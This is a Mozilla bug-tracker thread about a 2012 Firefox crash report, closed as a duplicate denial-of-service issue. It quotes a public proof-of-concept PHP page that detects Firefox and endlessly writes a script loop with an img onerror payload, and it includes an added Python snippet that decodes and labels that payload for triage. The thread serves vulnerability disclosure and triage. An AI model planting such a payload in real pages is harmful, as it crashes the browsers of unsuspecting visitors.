Bug 822264 - possible exploitable crash
Status: RESOLVED DUPLICATE of bug 817629 (Closed)
Opened 12 years ago, closed 12 years ago
Product/Component: Core :: DOM: Core & HTML, defect
Reporter: curtisk; Assignee: Unassigned
reported to sec@

=============//=============

Hi,

I tried this exploit http://1337day.com/exploit/19964 in a fully updated Mozilla browser and it did crash. The problem is that, according to the immunity debugger logs, it may be possible for someone to inject a shellcode. In case you need anything, contact me to help out.

Best regards,
Mavrofidis Manolis

--
A drop of water hollows the stone by persistence.
http://0x109.tuxfamily.org

=============//=============

copied script from quoted site

=============//=============

<!DOCTYPE html>
<html>
<body>
<?php
/*
Mozilla Firefox HTML/JS DOS Vulnerability - POC
by Sergio Yoshikata - @sergioyoshiman

Base64 encoded exploit
"/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>
*/
$exploit = 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0ZSAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29iYXInKTt9PC9zY3JpcHQ+';

// check if victim is using Mozilla Firefox
$firefox = strpos($_SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false;

if ($firefox) {
    // loop forever
    while (1) {
        // print exploit code infinite times.
        print(base64_decode($exploit));
    }
}
?>
</body>
</html>

# 1337day.com [2012-12-17]
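An added example for triage, not code from the reporter, the PoC author or Mozilla: it pulls the base64-looking literal out of the quoted PHP dropper, decodes it, and labels the markup features that account for the reported behaviour (a script tag, an inline event handler, an unbounded loop around document.write). The sample source is constructed from the script above; the regexes and label names are the example's own.

```python
import base64
import re

# Constructed sample input: the PHP dropper quoted in the bug description,
# reduced to the lines relevant here (same base64 literal as on the page).
SAMPLE_PHP = r"""<?php
$exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0ZSAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29iYXInKTt9PC9zY3JpcHQ+';
$firefox = strpos($_SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false;
if ($firefox) { while(1) { print(base64_decode($exploit)); } }
?>"""

# Quoted literals that look like base64: whole 4-char groups plus optional padding.
B64_LITERAL = re.compile(
    r"""['"]((?:[A-Za-z0-9+/]{4})+(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?)['"]"""
)

# Markup features worth surfacing to a triager, each with a label (example's own names).
MARKERS = [
    ("script-tag", re.compile(r"<script\b", re.I)),
    ("inline-event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("unbounded-loop", re.compile(r"\bwhile\s*\(\s*(?:true|1)\s*\)", re.I)),
    ("document-write", re.compile(r"\bdocument\.write\b", re.I)),
]


def decode_base64_literals(src: str) -> list[str]:
    """Decode every base64-looking quoted literal in src.

    Literals that are not valid base64, or do not decode to UTF-8 text,
    are skipped rather than reported.
    """
    out = []
    for m in B64_LITERAL.finditer(src):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
            out.append(raw.decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def classify_payload(text: str) -> list[str]:
    """Return the labels of all MARKERS found in text, in table order."""
    return [label for label, rx in MARKERS if rx.search(text)]


def scan(src: str) -> list[dict]:
    """Decode hidden literals and attach feature labels to each one that has any."""
    findings = []
    for payload in decode_base64_literals(src):
        labels = classify_payload(payload)
        if labels:
            findings.append({"payload": payload, "labels": labels})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_PHP):
        print(", ".join(finding["labels"]))
        print(finding["payload"])
```

The check is deliberately narrow: it reports what the obfuscated string is and which markup constructs it contains, which is the information the triagers below ask for when they say a resource-exhaustion loop alone is not a security issue.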
Updated•12 years ago
Flags: sec-bounty?
Comment 1•12 years ago
What are "immunity debugger logs"? This is a DOS in the most obvious form. Do they have crash report IDs?
Comment 2•12 years ago
Seems to be http://www.immunitysec.com/products-immdbg.shtml
Immunity debugger "logs" are not logs; it is a word I used to avoid mentioning everything about the CPU registers, the heap, the stack, etc. I did set up immunity dbg (later referred to as dbg) as just-in-time debugger. Well, according to the dbg and the information it revealed about the Firefox crash, registers and the heap allocation show a potential exploit out of this DOS vulnerability. As of this time, I haven't been able to build a stable exploit; I guess it needs some egg-hunting shellcode and I don't have sufficient time for this now. I may be attaching the Firefox JS engine in the debugger for more information about the subject.

Best regards,
Manolis
Comment 4•12 years ago
Can you just provide a regular crash ID or a stack trace?
Flags: needinfo?(mmavrofides)
Comment 6•12 years ago
We are getting multiple reports of this same code from various sources. I suspect that there is a site that has this code and we are just now getting informed of these.
Comment 7•12 years ago
http://pastebin.com/SigzqudB

Title   : Mozilla Firefox HTML/JS DOS Vulnerability - POC
Version : Mozilla Firefox Beta Version and Normal 17.0.1
Date    : 2012-12-06
Vendor  : http://www.mozilla.org
Impact  : Medium
Contact : sergioyoshiman [at] gmail.com
Twitter : @sergioyoshiman
tested  : windows XP SP3 & Windows 7 SP1
Author  : Sergio Yoshikata - Lima , Peru
==============================================================
Mozilla Firefox JS POC

"/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>
Updated•12 years ago
There is a site with the PoC, I already included it in my mail. I'll get you with a Crash ID and a trace in a couple of hours. I have a class now, so bear with me :)
Flags: needinfo?(mmavrofides)
Btw, it is being heavily distributed under a lot of sites such as 1337day.org and the rest dbs containing exploits, beyond the pastebin and the http://1337day.com/exploit/19964 . Full disclosure is the case here
Comment 10•12 years ago
It is being reported as a DOS. If you have information that this is exploitable, I haven't seen that publicly reported yet and I'd like to keep this closed until we know for sure.
Group: core-security
Updated•12 years ago
Group: mozilla-corporation-confidential, core-security
Updated•12 years ago
Group: mozilla-corporation-confidential
Comment 11•12 years ago
I already told you before, I have built an exploit that doesn't work at the time under Windows 7 (ASLR, DEP bypass is not implemented) and exploits the same vulnerability* that makes Firefox crash. I won't be giving the exploit. If I was to give the exploit, I'd build a stable one and then I'd sell it in the market and get some cash. Don't make the same mistakes other vendors do. Just patch the hole and if the exploit still works, I'll let you know with the exploit included.

Best regards,
Manolis

PS: The DoS is confirmed. The exploit works in OSes that don't have built-in protections such as ASLR, DEP, etc. I'll be adding the crash ID in ten minutes hopefully.
Comment 12•12 years ago
The code here is identical to bug 817629, down to the alert(2) bit. As I said in that bug, as far as I can tell this is not a security issue other than DoS, and is a duplicate of known non-security bugs. I'll be happy to be proved wrong, of course!
Comment 13•12 years ago
(In reply to Manolis Mavrofidis from comment #11)
> I already told you before, I have built an exploit that doesn't work at the
> time under Windows 7 (ASLR,DEP bypass is not implemented) and exploits the
> same vulnerability* that makes Firefox crash. I won't be giving the exploit.
> If I was to give the exploit, I'd build a stable one and then I'd sell it in
> the market and get some cash.

You don't need an exploit to bypass ASLR/DEP to earn some bug bounty cash from us, but we do need to see something more than resource exhaustion.
Comment 14•12 years ago
OK, I'll dig into the subject further, build a stable exploit, and I'll file a new report with the exploit and/or further bugs that I may find during the exploration.

Happy XMAS holidays everyone and guys, fix the bug :)

Manolis.
Updated•12 years ago
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → DUPLICATE
Comment 16•11 years ago
Triage: opening this up.
Group: core-security
Flags: sec-bounty? → sec-bounty-
Updated•5 years ago
Component: DOM → DOM: Core & HTML